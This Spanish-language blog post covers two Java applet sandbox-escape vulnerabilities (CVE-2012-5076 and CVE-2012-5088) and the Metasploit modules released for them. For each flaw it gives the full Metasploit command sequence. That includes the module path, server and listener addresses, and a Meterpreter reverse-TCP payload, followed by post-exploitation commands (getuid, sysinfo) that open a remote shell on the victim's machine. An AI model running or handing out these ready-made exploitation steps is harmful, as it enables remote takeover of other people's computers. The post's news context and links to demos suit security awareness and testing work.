Hace muy poco que se había descubierto un Grave 0day en Java que permitía a un atacante tomar el control de un sistema, esto trajo muchos inconvenientes tanto por parte de Oracle como de los usuarios de Java, llego el punto en que se recomendó por parte del gobierno de EE.UU a desactivar Java o simplemente eliminarlo por los potenciales perjuicios a los sistemas con Java corriendo.
Otro problema fue la tardanza de un parche oficial por parte de Java, pero tan rápido como salió el parche arreglando el 0day, aparecieron voces diciendo que no estaba bien parchado y que aun era posible explotar el bug. A todos estos inconvenientes sumemosle el hecho de que se empezaron a comercializar por internet 2 nuevas vulnerabilidades en Java...
Recientemente (01-22-2013) Metasploit proporcionado los módulos que explotan estos 2 bugs, y aquí los dejo con las especificaciones y los videos de explotación con Metasploit:
CVE-2012-5076 Java Applet AverageRangeStatisticImpl:
Este módulo abusa de AverageRangeStatisticImpl a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java, este es otro vector de ataque descubierto y parchado en noviembre de 2012, pero que renace de las cenizas. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.
use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo
CVE-2012-5088 Java Applet Method Handle:
Este módulo es parecido al anterior, pero abusa de Method Handle class a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.
use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo
Al actualizar Metasploit los módulos se agregaran automáticamente, igualmente les dejo los módulos:
- Java Applet Method Handle Remote Code Execution
- Java Applet AverageRangeStatisticImpl Remote Code Execution
Videos:
- CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
Más Información: https://community.rapid7.com/
0 Notaciones:
Publicar un comentario